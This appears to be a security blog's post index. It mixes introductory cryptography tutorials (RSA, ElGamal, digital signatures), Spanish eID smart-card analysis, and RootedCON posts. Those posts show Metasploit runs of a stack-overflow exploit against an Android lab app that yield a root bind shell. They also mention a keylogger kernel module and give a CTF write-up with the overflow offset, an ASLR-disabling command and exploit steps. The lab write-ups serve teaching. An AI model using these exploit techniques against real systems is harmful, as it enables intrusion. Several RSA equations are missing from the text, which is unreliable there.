Crypto Series: Introduction to the RSA algorithm
After seeing how the ElGamal system works, today we are going to take a look at the RSA public key cryptosystem. The RSA algorithm was first published by Rivest, Shamir and Adleman in 1978 and is probably the most used crypto algorithm today.
Despite this fact, the algorithm seems to have been invented by Clifford Cocks, a british mathematician who worked for a UK intelligence agency. Since this work was never published due to the top-secret classification, the algorithm received its name from Rivest, Shamir and Adleman who were the first to discuss it publicly. A document declassified in 1997 revealed the fact that Clifford Cocks had actually described an equivalent system in 1973.
Let me remind you once again that these posts are not intended to be 100% accurate in a mathematical sense, but an introduction for people who doesn't know much about cryptography. If you want more accurate and complete descriptions, take a crypto book such as the Handbook of Applied Cryptography I've linked in most of my posts :).
Setting up the RSA algorithm
The RSA algorithm is based on the assumption that integer factorization is a difficult problem. This means that given a large value n, it is difficult to find the prime factors that make up n.
Based on this assumption, when Alice and Bob want to use RSA for their communications, each of them generates a big number n which is the product of two primes p,q with approximately the same length.
Next, they choose their public exponent e, modulo n. Typical values for e include 3 (which is not recommended!) and (65537). From e, they compute their private exponent d so that:
Where is the Euler's totient of n. This is a mathematical function which is equal to the number of numbers smaller than n which are comprimes with n, i.e. numbers that do not have any common factor with n. If n is a prime p, then its totient is p-1 since all numbers below p are comprimes with p.
In the case of the RSA setup, n is the product of two primes. In that case, the resulting value is lcm((p-1)(q-1)) because only the multiples of p and q are not comprimes with n.
Once our two parties have their respective public and private exponents, they can share the public exponents and the modulus they computed.
Encryption with RSA
Once the public key (i.e. e and n) of the receiving end of the communication is known, the sending party can encrypt messages like this:
When this message is received, it can be decrypted using the private key and a modular exponentiation as well:
Example
sage: p=random_prime(10000) sage: q=random_prime(10000) sage: n=p*q sage: p,q,n (883, 2749, 2427367) sage: e=17 sage: G=IntegerModRing(lcm(p-1,q-1)) sage: d = G(e)^-1 sage: G(d)*G(e) 1 sage: m=1337 sage: G2=IntegerModRing(n) sage: c=G2(m)^e sage: c 1035365 sage: m_prime=G2(c)^d sage: m_prime 1337 |
In the commands above, I first create two random primes below 10000 and compute n. Then I create a IntegerModRing object to compute things modulo lcm(p-1,q-1) and perform the computation of the private exponent as the inverse of the public exponent on that ring.
Next, I create a new ring modulo N. Then I can use the public exponent to encrypt a message m and use the private exponent to decipher the cryptotext c... and it works!
Correctness of RSA encryption/decryption
We have seen it works with our previous example, but that doesn't prove that it really works always. I could have chosen the numbers carefully for my example and make them work.
Euler's theorem tells us that given a number n and another number a which does not divide n the following is true:
Therefore, and since , for any message m that does not divide n the encryption and decryption process will work fine. However, for values of m that divide n we need to use more advanced maths to prove the correctness.
Another way to prove it is to use Fermat's little theorem and the Chinese Remainder Theorem. I will explain these theorems in my next post and then I will provide a complete proof based on them.
RSA for signing
In the case of RSA, digital signatures can be easily computed by just using d instead of e. So, for an RSA signature one would take message m and compute its hash H(m). Then, one would compute the signature s as:
For verifying the signature, the receiving end would have to compute the message hash H(m) and compare it to the hash contained in the signature:
Therefore, if the hash computed over the received message matches the one computed from the signature, the message has not been altered and comes from the claimed sender.
Security of RSA
In order to completely break RSA, one would have to factor n into it's two prime factors, p and q. Otherwise, computing d from e would be hard because (p-1) and (q-1) are not known and n is a large number (which means that computing its totient is also difficult).
In a few posts I will show an algorithm to solve the factorization problem. However, another way to break RSA encrypted messages would be to solve a discrete logarithm. Indeed, since , if one solves the discrete logarithm of c modulo n, the message would be recovered.
Luckily, we already know that discrete logs are not easy to compute. And in this case, solving one does not break the whole system but just one message.
RootedCON: Examples + small summary
It's been almost a month since RootedCON, but I didn't have any time to spend on preparing the .tgz file with the example shellcodes, poc apps and exploits we showed during our talk. And neither did I publish any kind of summary or anything about the event...
You can also find Javi's post on the RootedCON here. It's in Spanish, don't say I didn't warn ;-). You can also find the slides of our presentation here.
Examples from our presentation on Android exploitation
First things first, here is the examples we used during the presentation. As a quick summary, this is how I use the buffer overflow exploit.
First, launch the emulator and wait for it to start. Then, with adb you need to forward a couple of ports: 2000 for the vulnerable apps and whatever you like for your bind shell. Then you can launch the binary, which I had uploaded using adb push to /data/bin/myapp:
eloi@EloiLT:~/android/paper$ adb forward tcp:2000 tcp:2000 eloi@EloiLT:~/android/paper$ adb forward tcp:2222 tcp:2222 eloi@EloiLT:~/android/paper$ adb shell # /data/bin/myapp |
Now, you can launch the exploit from metasploit:
msf > use exploit/linux/misc/android_stack msf exploit(android_stack) > set payload linux/armle/shell_bind_tcp payload => linux/armle/shell_bind_tcp msf exploit(android_stack) > set RPORT 2000 RPORT => 2000 msf exploit(android_stack) > set LPORT 2222 LPORT => 2222 msf exploit(android_stack) > exploit [*] Started bind handler [*] Command shell session 1 opened (127.0.0.1:55207 -> 127.0.0.1:2222) [*] Command shell session 1 closed. msf exploit(android_stack) > exploit [*] Started bind handler [*] Command shell session 2 opened (127.0.0.1:34834 -> 127.0.0.1:2222) /system/bin/id uid=0(root) gid=0(root) exit [*] Command shell session 2 closed. msf exploit(android_stack) > |
The same thing applies to the cpp_challenge demo application. You just use a different exploit, but that's it. Beware that you might have to tune some addresses on your local installation, as they are hardcoded. However, I believe they should be static for every installation.
In addition to apps and the metasploit stuff, you can also find two kernel modules. One is a simple find syscall table module, and the other one is a keyboard logger. The latter only works for linux >= 2.6.28, for earlier versions you need to change it slightly.
RootedCON mini-summary
I won't spend much time on it, as it's been quite some time already and I don't feel like writing a complete summary of it.
Overall I think it was a great event. Sure there is stuff that can be improved as everywhere, but for being the first edition it was very good. From the talks I attended, in my opinion there were great talks but also a one or two I didn't really like. On our side, we are pretty happy with the way it was received and the reactions we have seen 🙂
Besides the talks, and probably even more important, it was great to meet so many people that I'd only know through the Internet otherwise. Cheers to all of you guys, hope to see you next year at RootedCON or maybe earlier somewhere else 🙂
Understanding the DNIe, Part II : Secure Messaging
Let's go a little further in our way to understand the way the DNIe works. In my previous post I talked about the device authentication procedure and today I'll talk about what happens next, how Secure Messaging protects all the subsequent communication.
By the way, I updated the previous post with information on how to get the card's serial number.
Device authentication, quick reminder
As I said in the previous blog, the device authentication phase consists of the following steps:
- Certificate exchange: The terminal (IFD) requests a X.509 certificate from the card and sends its own certificate and an intermediate CA's certificate to the card
- Internal authenticate: The IFD sends a random challenge to the card and requests it to authenticate itself. This is done with an RSA signature, which is then encrypted for the IFD, and includes a 32 byte random number known as Kicc.
- External authenticate: The terminal authenticates itself, requesting a challenge from the card and sending a signed and encrypted message to the card. Again, this message includes a 32 byte random number known as Kifd.
- Key generation: both ends generate a key for encryption and a key for authentication. This is done by XORing first the two random numbers, and computing then the SHA-1 hash of the result with a constant 1 appended for the encryption key and a constant 2 for the authentication (MAC) key.
So basically at the end of this process, both ends share a pair of keys that can be used for protecting the confidentiality and the integrity of subsequent messages.
Let's see how this is done.
RootedCON CTF write-up ‘hello’ challenge
As you probably know, last week I was at RootedCON. During the congress, a Caputre The Flag contest was organized, where each participant had to resolve several challenges.
Although I didn't register for the contest, I got a copy of one of the binaries from a friend of mine. I'm sorry to be too late for it, if I had been on time he would have won a 1000 euro prize... but I had no time due to my talk. Sorry dude!
However, yesterday morning I had some spare time after the other guys left the hotel and during my flight, so I gave it a try. Yesterday during one of the talks I did a preliminary reverse engineering session with IDA Pro and quickly spotted the flaw: as the hints said, it was a stack buffer overflow using sprintf() in the say_something function :
public say_something say_something proc near var_118= dword ptr -118h var_114= dword ptr -114h var_110= dword ptr -110h var_106= byte ptr -106h var_C= dword ptr -0Ch arg_0= dword ptr 8 push ebp mov ebp, esp sub esp, 118h mov [esp+118h+var_110], 3E8h mov [esp+118h+var_114], 0 mov [esp+118h+var_118], offset petete call _memset mov [esp+118h+var_110], 3E8h mov [esp+118h+var_114], offset petete mov eax, [ebp+arg_0] mov [esp+118h+var_118], eax call _read mov [ebp+var_C], eax mov eax, offset aHolaS ; "Hola %s" mov [esp+118h+var_110], offset petete mov [esp+118h+var_114], eax lea eax, [ebp+var_106] mov [esp+118h+var_118], eax call _sprintf mov eax, [ebp+var_C] add eax, 5 mov [esp+118h+var_110], eax lea eax, [ebp+var_106] mov [esp+118h+var_114], eax mov eax, [ebp+arg_0] mov [esp+118h+var_118], eax call _write mov [esp+118h+var_110], 1 mov [esp+118h+var_114], offset asc_8048F3B ; "\n" mov eax, [ebp+arg_0] mov [esp+118h+var_118], eax call _write leave retn say_something endp |
They also provided an address space map from /proc/pid/maps, where one can see that the stack ends at 0xc0000000, which is the default userspace/kernelspace boundary in Linux x86. This means that ASLR is not enabled, so I just disabled it:
# echo 0 > /proc/sys/kernel/randomize_va_space |
Then, I tried to exploit it launching the binary from the shell. However, the binary goes through several steps before it reaches the vulnerable code path. First it is 'daemonized': it forks and the parent process exists while the child process continues in the background. Not too bad, you can just attach to the child process with gdb, but this is not the interesting process yet. After it is daemonized, it does something along the lines of the following C code:
if(setuid(0x837)==-1) die("could not drop privs"); if((pw_struct = getpwuid(0x837))==NULL) die("Could not get pw entry"); chdir(pw_struct->pw_dir); |
And then the process creates a socket and binds it to the tcp port 7878 and listens for incoming connections. Once a connection is received, it forks and serves it in the child process, while the parent process just goes back to the listen loop. This last process is the one we'd like to analyze, since this is the one calling our vulnerable function.
All this means that we'll need to do one of two things to reach this vulnerable code during our analysis: either we create a user with the uid needed or we patch the program to bypass these calls or to ask for a different uid. I took the first approach.
So what I did was connecting with netcat and attaching to the last process before sending any data. Then I sent a 300 byte pattern generated with Metasploit's pattern_create.rb:
$ nc localhost 7878 <Attach to process with gdb> Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9 eloi@EloiLT:~$ |
This is what happens in gdb:
Program received signal SIGSEGV, Segmentation fault. 0x41376941 in ?? () |
Great. It seems we control eip and this definitely looks like part of the metasploit pattern. Let's find which part it is:
$ ./pattern_offset.rb 41376941 300 261 |
Allright, we have 261 bytes before we hit eip. This is a weird number, but it's due to the fact that it uses sprintf() with 5 characters in front of our input. Now we can use gdb to find where the buffer starts, and we find it at 0xbffff1c2. So this is our current situation: we can enter 261 bytes of data, then we have eip which we control, and then we have still some more room (up to the 1000 bytes read by the daemon from the network).
So, we'll just fill the buffer with junk, then an address in the middle of our nop sled (such as 0xbffff380), then some nops and then our payload. Since we do not have ASLR or anything, this will just work. We use a nop sled to count for the different environment the CTF server would have: a different list of environment variables will make the stack move slightly up or down.
Now we can make a metasploit module for it, and just launch it:
msf > use exploit/linux/misc/ctf_rooted msf exploit(ctf_rooted) > set payload linux/x86/shell_bind_tcp payload => linux/x86/shell_bind_tcp msf exploit(ctf_rooted) > set encoder x86/countdown encoder => x86/countdown msf exploit(ctf_rooted) > exploit [*] Started bind handler [*] Command shell session 1 opened (127.0.0.1:60111 -> 127.0.0.1:2222) id uid=1000(eloi) gid=1000(eloi) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),109(lpadmin),115(admin),1000(eloi) pwd /tmp Abort session 1? [y/N] y |
The metasploit module can be found here. You can see that it is a pretty simple module and it works fine on my local machine. Maybe you need to change something in yours (at the very least, disabling randomize_va_space is required) but it should be very similar or identical.
I did actually fill the buffer with the return address repeated many times because it failed when I was not attached with gdb and wanted to be sure I was overwriting the saved eip. I didn't investigate the reason, just solved it putting the ret address instead of nops and making a slightly bigger nop sled than I had before.
Since it is a remote exploit and the environment may vary greatly from your own machine to the CTF machine, it is possible that some bruteforcing of the return address is needed. Anyway, the daemon continues alive even if your exploit fails, so it should be no problem.
Again, I'm sorry dude I could not help you on time. Anyway, I'm sure you guys had great fun with it!
RootedCON coming up!
Yes, it's finally there!
RootedCON will take place the coming week in Madrid, and I'll be there to present together with Javi some stuff about Android on Saturday. You can see our first slide spoiled by Javi on twitter here: http://twitpic.com/18f6cy
The schedule looks promising and I think we are going to have loads of fun 😀
I'll be there the three days, so if you want to talk to me about anything interesting (info security, side channel analysis, cryptography, whatever...) or have a beer just drop by!
See you there!
Understanding the DNIe, Part I : Device Authentication
For a long time I wanted to have the opportunity to analyze the Spanish electronic ID, known in Spain as the DNIe. Last Christmas I was finally able to get an appointment with the appropriate police station in Spain and could get my brand new DNIe. Over a few posts I'm going to tell you how I've been trying to understand what the device does without access to any confidential information whatsoever, using information freely available on the Internet and analyzing communication logs between my PC and my DNIe.
The DNIe is a smart card implementing an E-SIGN application. This application is specified by the CWA-14890 documents (where CWA means CEN Workshop Agreement, and CEN means European Committee for Standardization ) and provides an interoperable framework for secure signature devices.
These devices are designed to be used for electronic signatures, and in the Spanish case it has replaced the identity document we have used for many years. It is an ISO 7816 compliant smart card, with (afaik) a custom operating system. The IC has received an EAL5+ Common Criteria certificate issued by the French scheme, while the ICC has been certified by the Spanish scheme and has obtained EAL4+.
This is all public documentation you can find on the Internet:
- EAL5+ CC certificate for the ST19WL34A issued by Serma Technologies in 2005.
- EAL4+ CC certificate for the DNIe OS issued by the CCN.
- ESIGN specifications: CWA14890-1 and CWA14890-2.
These documents show the Common Criteria certificates for the chip and the card, and the specifications of the protocol followed by the card.
Further, the Spanish Administration provides an OpenSC library in binary form, that one can use for communicating with the cards in Linux an Mac OS X. They also provide a CSP for Microsoft Windows. In the remainder of this post I'll explain my attempts at understanding how the device and the protocol work.
Everything has been done with consumer equipment on an Ubuntu 9.10 computer and using public documentation, thus everyone holding an actual DNIe should be able to reproduce these steps. Let's try to understand the details about this thing and how it communicates with our PC. We will start with the Device Authentication phase, which is the first thing that takes place when you use your eID.
Let me remind once again that I do not have access to any confidential information related to the DNIe, and therefore this is all public information. Also, I've done this analysis on my own free time sitting at home and using publicly available tools and a PCSC reader obtained from Tractis.
Crypto Series – ElGamal Cryptosystem
In our last post we learnt about the Discrete Lograithm problem, why it is a difficult problem and how we can attempt to solve it if the numbers are manageable. Of course, in a real setting we wouldn't use 16 bit numbers as in my example, but at least 1024 bit numbers nowadays (and most likely even bigger numbers).
Now, we are going to see how to make use of that problem to create a public key cryptosystem. We will look at how ElGamal uses the DL problem to provide public key encryption and digital signatures. Keep on reading if you are interested!
Crypto Series: Discrete Logarithm
From last post, it becomes clear that at this stage we won't be able to make it without some maths. That's because we are dealing now with public key crypto, which is based on difficult mathematical problems (as in difficult to solve, not as in difficult to understand).
With symmetric crypto, we could understand the concepts of diffusion and confusion without needing to dive into maths. On the other hand, here we will need to understand the problems on which the algorithms rely in order to understand how they work.
In this post, we'll see what's the Discrete Logarithm problem, why it is difficult to solve based on a simple intuition, and finally a method to solve this kind of problems. Of course it's not the only (nor the best) existing method, but in my opinion it is the simplest one to understand.
Welcome to Limited Entropy Dot Com
Well, not much to say, this blog is just coming to life now. I've imported everything from my previous blog and posted a note there so that current readers can still follow me. The template used is still a default one, but I asked a friend of mine to apply some small personalization to it whenever she has time, so it will change a little in the future.
If you are new here, take a look at the About page to know a little more about the guy writing these lines. I'll continue talking about security, cryptography and all that weird stuff I like starting today. Stay tuned!
Crypto Series: Digital Signatures
In the previous post, I said I'd write about the Discrete Logarithm problem in the next post. However, I forgot to mention the general idea behind digital signatures. Since I can't sleep right now and have to take a train to the airport in a couple of hours, I decided to go ahead and write a few lines about digital signatures ;-).
Basic idea
The basic idea behind digital signatures is to make use of the fact that in public key cryptography a user has a private key which is never disclosed to anyone in order to authenticate the user or messages generated by that user.
In a symmetric setting, authentication is performed using MAC or HMAC mechanisms, and at least two parties know the key used to generate those messages. Therefore, a given party could deny that he or she generated a given authenticated message, because he is not the only one who knows that key and therefore there is no proof that he did generate the message.
Of course, if only two parties know the key, and one of the parties knows that a particular message was not generated by himself, then it must come from the other party. However, in a legal dispute, there is no way to prove that and to an external observer both of the options are equally likely.
To solve that issue, digital signatures generate a sort of authentication code using a private key, never disclosed to anyone. Then, using the related public key, everyone can verify that signature and therefore be sure that the message came from that user. Since that entity is the only one knowing the private key, this sort of construction can be used to bind a user to a message and resolve any legal disputes that might arise.
Normally, you can see the digital signature generation process as some sort of encryption with a private key. On the other hand, you can imagine the signature verification (or opening) phase as a decryption using the public part of the key.
Practical usage of digital signatures
In real world, documents are usually way larger than the message length that common digital signature algorithms can handle directly. Since authenticating each chunk of a document is not very practical (asymmetric crypto is usually slooooow), in practice a cryptographic hash is computed over the document, and the hash is signed using the private key and the signature algorithm.
Then, in the verification stage, a second hash is computed and compared against the signed hash. If they match, the signature is correct and therefore the received document was created by the signing party and has not been modified.
Of course, this assumes that cryptographic hash functions behave as expected, and there are no collisions. Ohterwise, if one might find another document which produces the same hash (and thus the same signature), any legal proof that the document was created by the private key holder would be destroyed.
Therefore, choosing secure hash functions for usage within digital signatures is a crucial issue. As an example problem that arose due to the use of insecure hash functions with digital certificates, check the Hashclash project.